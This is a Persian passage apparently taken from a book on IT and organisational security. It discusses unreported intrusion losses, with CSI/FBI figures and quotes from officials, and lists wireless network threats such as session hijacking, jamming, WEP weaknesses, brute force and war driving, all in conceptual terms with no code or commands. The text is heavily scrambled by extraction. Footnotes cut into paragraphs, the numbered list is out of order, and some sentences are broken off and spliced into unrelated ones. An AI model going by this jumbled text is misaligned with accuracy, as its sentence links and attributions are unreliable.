ﻛﺮﻣﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻟﻮﺩﻩ ﺷـﺪﻩ ﺑﻮﺩﻧـﺪ ١٥٠.ﺗﺤﻘﻴـﻖ ﺳـﺎﻝ ۲۰۰۱
CSI/FBIﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺘـﻲ ﻧـﺸﺎﻥ ﺩﺍﺩ ﻛـﻪ
ﺑﺪﻟﻴﻞ ﻧﻔﻮﺫﻫﺎ ﺑﻴﺶ ﺍﺯ ۳۷۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺑﻪ ﺑـﺎﺭ ﺁﻣـﺪﻩ
١٥١
ﺍﺳﺖ.
ﺩﻟﻴﻞ ﺍﺻﻠﻲ ﻋﺪﻡ ﺑﺮﺧﻮﺭﺩ ﻣﻨﺎﺳﺐ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﺣـﻮﺍﺩﺙ ﺩﺭ ﺩﻧﻴـﺎ
ﺗﺮﺱ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺁﻧﻬـﺎ ﺍﺳـﺖ ١٥٢.ﺷـﺮﻛﺘﻬﺎﻱ ﻣـﺎﻟﻲ ﺑـﺪﻟﻴﻞ
۱۴۸ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺟﻬﺘﮕﻴﺮﻱ ﺳﺎﻻﻧﻪ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ.
۱۴۹ﺍﻳﻦ ﻧﺘﺎﻳﺞ ﺩﺭ ﮔﺰﺍﺭﺷﻲ ﺍﺯ ﻣﺆﺳﺴﺔ Celent Communications
ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣﻨﺘﺸﺮ ﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ FTCﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ
ﺍﺳﺖ.
150 http://www.infosecuritymag.com/articles/
october01/images/survey.pdf
۱۵۱ﻧﻤﺎﻳﻨﺪﺓ ﻭﻳﮋﺓ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺳـﺮﻭﻳﺲ ﻣﺨﻔـﻲ ﺟـﺮﺍﺋﻢ ﻣـﺎﻟﻲJames ،
،Savageﮔﻔﺘــﻪ" :ﺍﻳــﻦ ﺁﻣــﺎﺭ ﺣﻜﺎﻳــﺖ ﺍﺯ ﺍﺷــﻜﺎﻻﺕ ﺟــﺪﻱ ﺩﺭ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﻣﻌﻨـﻲ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺟﺎﻣﻌـﺔ
ﺗﺠﺎﺭﻱ ﺗﻤﺎﻳﻞ ﺩﺍﺭﺩ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻈـﺮ ﺁﺳـﻴﺐ ﺩﻳـﺪﻩ " .ﺍﻭ ﻣﻌﺘﻘـﺪ
ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﺑﻴﺎﻧﮕﺮ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﺍﺯ ﻭﺍﻗﻌﻴﺖ ﺁﺳـﻴﺒﻬﺎﻱ
ﻭﺍﺭﺩﻩ ﺑﻪ ﺟﺎﻣﻌﺔ ﺗﺠﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺑﺎﺷﺪ ۳) .ﺍﻛﺘﺒﺮ (۲۰۰۳
۱۵۲ﻧﻤﺎﻳﻨﺪﺓ ﻣﺨﺼﻮﺹ ،Cornelius Tate ،CERTﺑﻪ ﺍﻳـﻦ ﺗﻤﺎﻳـﻞ
ﺑﻪ ﮔﺮﻳﺰ ﺍﺯ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺭﺧﺪﺍﺩﻫﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ" :ﻓﻜﺮ ﻣﻲﻛﻨﻢ
ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﻟﻜﻪﺩﺍﺭ ﺷﺪﻥ ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﺧﻮﺩ ،ﺍﺯ ﮔﺰﺍﺭﺵ ﺁﺳـﻴﺒﻬﺎ
ﻭ ﺿﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻴﻤﻨﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣﺎﻧﺪﻥ
ﺭﺍ ﺗﺮﺟﻴﺢ ﻣﻲﺩﻫﻨﺪ .ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﻳﻚ ﺑﻨﮕﺎﻩ ﺍﻗﺘـﺼﺎﺩﻱ
ﻫﺪﻑ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻣﺸﺘﺮﻳﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ
ﺍﻋﺘﻤـﺎﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺑﺪﻫﻨــﺪ ﻭ ﺍﺯ ﺁﻥ ﭘــﺲ ﻣﺎﻳــﻞ ﻧﺒﺎﺷــﻨﺪ
ﺍﻃﻼﻋﺎﺗﺸﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﺑﻨﮕـﺎﻩ ﺫﺧﻴـﺮﻩ ﺷـﻮﺩ .ﺿـﺮﻭﺭﻱ
ﺍﺳﺖ ﻛﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺑﻪ ﻧﺤﻮﻱ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ ﻛﻪ ﺿـﺎﻣﻦ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ ﺑﺎﺷـﺪ .ﺭﺳـﺎﻧﺔ
ﺑﻲﺳﻴﻢ -ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ -ﺭﺳـﺎﻧﺔ
ﺍﻣﻨﻲ ﻧﻴﺴﺖ .ﺷﺘﺎﺏ ﭼﺸﻤﮕﻴﺮ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺳﺎﺯﮔﺎﺭﻱ ﺑﺎ ﺑـﺴﺘﺮ
ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺳﺮﮔﺮﺩﺍﻧﻲ ﺑﺰﺭﮔﻲ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺝ .ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑـﻪ ﺳـﻪ ﺷـﻜﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻣﻲﺑﺎﺷﻨﺪ :ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ ﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ 802.11b
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺷﺒﻜﻪﻫﺎﻱ ) CDMA/TDMA/GSMﺗﻠﻔـﻦ
ﻫﻤﺮﺍﻩ ﻭ (PCSﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭ PDAﻫـﺎ؛ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭ ﻭﻳﻮ ﭘﺮﻗﺪﺭﺕ ﻛﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﻠﻔﻦ ﺟﻬـﺖ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺴﺎﻓﺘﻬﺎﻱ ﻃﻮﻻﻧﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ .ﺑـﺎ ﺍﻳﻨﻜـﻪ
ﻫﺮ ﺳﻪ ﻣﻮﺭﺩ ﻓﻮﻕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻣﻌﻤﻮﻝ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﻫﻤﮕـﻲ
ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻭ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻛﺎﻧﺲ
ﺭﺍﺩﻳﻮﻳﻲ ) (RFﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺸﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺑﻴﺎﻧﺠﺎﻣﺪ.
ﺷﺒﻜﻪ ﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺼﻮﺭﺕ ﺍﻧﻔﺠـﺎﺭﻱ ﮔـﺴﺘﺮﺵ ﭘﻴـﺪﺍ ﻛﺮﺩﻧـﺪ.
ﻱ ﻣﺪﺍﻭﻡ ﺍﺗـﺼﺎﻻﺕ ﺑﺎﻋـﺚ
ﻲ ﻧﺼﺐ ﻭ ﺑﺮﻗﺮﺍﺭ ﹺ
ﻫﺰﻳﻨﺔ ﻧﺎﭼﻴﺰ ،ﺳﺎﺩﮔ ﹺ
ﮔﺴﺘﺮﺵ ﺳﺮﻳﻊ ﺁﻧﻬﺎ -ﺑﺨﺼﻮﺹ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ -
ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻭﺍﻗﻊ ﮔﻤﺎﻥ ﻣﻲﺭﻓﺖ ﻛـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﻲﺳـﻴﻢ
ﻫﻤﺎﻥ ﻛﺎﺭﺑﺮﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺳـﻨﺘﻲ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺍﻣـﺎ ﺑـﺪﻭﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑﻞ .ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﺷﺒﻜﻪﻫـﺎ ﺑـﺪﻟﻴﻞ ﺳـﻬﻮﻟﺖ ﻛـﺎﺭ
ﻛــﺎﺭﺑﺮﺍﻥ ﺍﺳــﺖ ﻭ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﺗﺤــﺖ
ﺿﺮﺭﻫﺎﻱ ﻣﺎﻟﻲ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﮔﺰﺍﺭﺵ ﻣﻲﺷﻮﺩ .ﺑﺮ ﺍﺳـﺎﺱ
ﺗﺠﺮﺑﺔ ﻣﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻨﺪ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ
ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺧﻮﺩ ﺭﺍ ﮔﺰﺍﺭﺵ ﻛﻨﻨﺪ .ﺑﻨﻈﺮ ﻣﻦ ﺳﺎﻝ ﺑـﻪ ﺳـﺎﻝ
ﻣﻲﺗﻮﺍﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺩﺭ ﺯﻳـﺎﻥ ﺷـﺮﻛﺘﻬﺎ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨـﻲ
ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﺷﺮﻛﺘﻬﺎ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛـﻪ ﻫـﺮ
ﻛﺲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻳﻚ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ،ﻭ ﻗﺮﺑـﺎﻧﻲ ﺷـﺪﻥ ﺩﺭ
ﺣﻤﻼﺕ ﺑﺘﺪﺭﻳﺞ ﻣﻮﺭﺩ ﻗﺒﻮﻝ ﻭﺍﻗﻊ ﺷﺪﻩ ﻭ ﺩﻳﮕﺮ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﻣﺮﺑﻮﻁ ﺑـﻪ
ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﮔﺬﺷﺘﻪ ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻋﻤﻮﻣﻲ ﻧﻤﻲﺷﻮﺩ".
١٨٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺍﺷﺘﻦ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺐ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻣﺤـﺪﻭﺩﻩ ﺍﺭﺳـﺎﻝ
ﺑﺴﺘﻪ ﻫﺎ ﺑﺎﺷﺪ ،ﻗﺎﺩﺭ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ .ﻭﺳـﺎﻳﻞ
ﺗﻘﻮﻳﺖ ﺳﻴﮕﻨﺎﻝ ﻭ ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻩ ﻧﻴـﺰ ﺑـﻪ ﻭﻓـﻮﺭ
ﻣﻬﻴﺎﺳﺖ؛ ﻭ ﻟﺬﺍ ﻧﺎﺣﻴﻪﺍﻱ ﻛـﻪ ﺗـﺼﺎﺣﺐ ﺗﺮﺍﻓﻴـﻚ ﺩﺭ ﺁﻥ
ﻣﻤﻜﻦ ﺍﺳﺖ ،ﻭﺳﻴﻊ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ IEEE 802.11ﻭ ﺩﺭ ﺍﺭﻭﭘﺎ ﺗﺤـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭ GSM
ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ .ﻫﻨﮕﺎﻡ ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ،ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ
ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﺷﻮﺩ.
ﻫﻔﺖ ﺩﺳﺘﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻭﻟﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ
١٥٣
ﻗﺎﺑﻞ ﺫﻛﺮ ﺍﺳﺖ:
.۲
ﺳﺮﻗﺖ ﺟﻠﺴﻪ :١٥٦ﻛﻪ ﺑﻪ ""man in the middle
ﻧﻴﺰ ﻣﻌﺮﻭﻑ ﺍﺳﺖ ،ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﺍﻳﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺩﺭ
ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ،ﺗﻠﻔـﻦ ﻫﻮﻳـﺖ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨـﺪ ،ﺍﻣـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ
ﺑﺮﺍﻱ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﺪ؛ ﭘﺲ ﻣﻲﺗـﻮﺍﻥ ﻳـﻚ ﺟﻠـﺴﺔ
ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺗﻠﻔﻦ ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺗﻠﻔﻦ
ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻮﺿﻮﻉ ﭘﻲ ﺑﺒﺮﺩ ﺳﺮﻗﺖ ﻛـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ
ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ.
.۳
ﭘﺎﺭﺍﺯﻳﺖ ﺩﺍﺩﻥ :ﺍﻳﻦ ﺣﻤﻠﻪ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ
ﺳﺮﻭﻳﺲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺩﺍﺩﻩﭘﺮﺍﻛﻨﻲ ﻭ ﭘﺨﺶ
ﻱ ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ
ﺲ ﻛﺎﺭ ﹺ
ﻋﻤﻮﻣﻲ ١٥٧ﺩﺭ ﻓﺮﻛﺎﻧ ﹺ
ﺩﺭ ﻃﻴــﻒ ﻓﺮﻛــﺎﻧﺲ ﺭﺍﺩﻳــﻮﻳﻲ ﺷــﺒﻜﺔ ﺑــﻲﺳــﻴﻢ ﺍﻳﺠــﺎﺩ
ﺳﺮﺭﻳﺰ ١٥٨ﻛﻨﺪ.
.۴
ﺣﻤﻼﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ :١٥٩ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ
IEEE 802.11ﺍﺯ ﺍﻟﮕـــﻮﺭﻳﺘﻢ ١٦٠WEPﺑـــﺮﺍﻱ
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨــﺪ .ﺭﻭﺵ ﺭﻣــﺰﮔــﺬﺍﺭﻱ ﻭ
ﺑﺮﺩﺍﺭﻫﺎﻱ ﻣﻘـﺪﺍﺭ ﺍﻭﻟﻴـﺔ ﺍﻳـﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺑـﺴﻴﺎﺭ ﺿـﻌﻴﻒ
ﻫﺴﺘﻨﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺑﺎﺭﻫﺎ ﺷﻜﺴﺘﻪ ﺷﺪﻩﺍﻧﺪ.
.۵
ﺗﺼﺎﺣﺐ ﺗﺮﺍﻓﻴﻚ ﻭ ﺍﻧﺠﺎﻡ ﺩﻳﺪﻩﺑﺎﻧﻲ :ﺑﺮﺩ ﺗﻘﺮﻳﺒﻲ
ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺳـﻴﺎﺭ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ 802.11bﺣـﺪﻭﺩ
۳۰۰ﻓﻮﺕ ﺍﺳﺖ .ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮ ﻓـﺮﺩﻱ ﺑـﺎ
۱۵۳ﺍﻳﻦ ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜـﻲ ﺍﺯ ﺍﻋـﻀﺎﻱ ﻣﺮﻛـﺰ ﺗﺤﻠﻴـﻞ CERT
ﺍﺳﺖ.
Insertion Attacks
Mobile Access Point
Session Hijacking
Broadcasting
Flooding
Encryption
Wired Equivalent Privacy
154
155
156
157
158
159
160
.۷
ﺗﻨﻈﻴﻤﺎﺕ ﻧﺎﺩﻗﻴﻖ :ﻫﺮﮔﻮﻧﻪ ﺍﺑﺰﺍﺭ ،ﺧﺪﻣﺎﺕ ،ﻳـﺎ ﺑﺮﻧﺎﻣـﺔ
ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷـﺪ ،ﻛـﻞ
ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ
ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﻲ ﺳـﻴﻢ ،ﺑﻄـﻮﺭ ﭘـﻴﺶﻓـﺮﺽ
ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺧـﺪﻣﺎﺕ
ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ .ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫـﺮ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺳﻴﺎﺭ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺩﺭﺧﻮﺍﺳـﺖ
ﺟﻠﺴﺔ telnetﻳﺎ ftpﻧﻤﻮﺩﻩ ﻭ ﭘﺎﺳﺦ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ.
.۸
ﺣﻤــﻼﺕ :Brute Forceﺍﻏﻠــﺐ ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ
ﺑﻲﺳﻴﻢ ،ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺒﻜﻪﻫﺎﻱ
ﻼ ﺑـﺮ
ﺑﻲﺳـﻴﻢ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ) brute forceﻣـﺜ ﹰ
ﺍﺳﺎﺱ ﻳﻚ ﻓﺮﻫﻨﮓ ﻟﻐﺖ( ﻧﺎﺍﻣﻦ ﻛﺮﺩﻩ ﺍﺳﺖ.
War Driving
ﺟﺎﺳﻮﺳﻲ ﺻﻨﻌﺘﻲ ﻭ ﺟﺮﺍﺋﻢ ﺍﺩﺍﺭﻱ ﺑﺎ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ
ﺑﻪ ﺑﺎﻻﺗﺮﻳﻦ ﺣﺪ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩﺍﻧـﺪ War dialing .ﺑـﻪ ﻣﻌﻨـﺎﻱ
ﺗﻤــﺎﺱ ﺑــﺎ ﺗﻤــﺎﻡ ﺷــﻤﺎﺭﻩ ﺗﻠﻔﻨﻬــﺎﻱ ﺳــﺎﺯﻣﺎﻥ ﻭ ﻳــﺎﻓﺘﻦ ﺷــﻤﺎﺭﺓ
ﻣﻮﺩﻡﻫﺎﻱ ﺁﻥ ،ﺟﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ war drivingﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳـﻦ
ﻣﻔﻬﻮﻡ ﺟﺪﻳﺪ ﻳﻌﻨﻲ ﺟﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ ﺷـﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ
ﺑﻲﺳﻴﻢ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﻭ ﺿﺒﻂ ﺗﺮﺍﻓﻴـﻚ ﺷـﺒﻜﺔ ﺁﻧﻬـﺎ ﺑـﺎ
ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ .ﺑﻨﺎ ﺑﻪ ﮔﻔﺘـﻪ ﺩﻳـﻮ ﺗﻮﻣـﺎﺱ ١٦١ﺑـﺎﺯﺭﺱ ﺍﺭﺷـﺪ
ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ war driving ،FBIﭘﺪﻳﺪﻩﺍﻱ ﺩﺭﺣـﺎﻝ
161 Dave Thomas
ﺑﺨﺶ ﺳﻮﻡ
.۱
ﺣﻤﻼﺕ ﺩﺭﺝ :١٥٤ﻧﻔﻮﺫﮔﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ
ﻧﻘﻄﻪ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺎﺭ ١٥٥ﻧﺎﺍﻣﻦ ،ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ "ﺩﺍﺩﻩ" ﻭﺍﺭﺩ
ﻛﻨﺪ.
.۶
ﺍﺭﺗﺒﺎﻁ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺑﺎ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺩﻳﮕـﺮ :ﺍﻏﻠـﺐ
ﻧﻘــﺎﻁ ﺳــﻴﺎﺭ )ﻣﺜــﻞ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺎﺑــﻞ ﺣﻤــﻞ ﻭ PDAﻫــﺎ(
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺧﺪﻣﺎﺕ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﻫﺮﮔﻮﻧـﻪ ﺧـﺪﻣﺎﺕ
TCP/IPﺭﻭﻱ ﺁﻧﻬــﺎ ﻓﻌــﺎﻝ ﺑﺎﺷــﺪ ،ﻗــﺎﺩﺭ ﺑــﻪ ﺍﺭﺗﺒــﺎﻁ
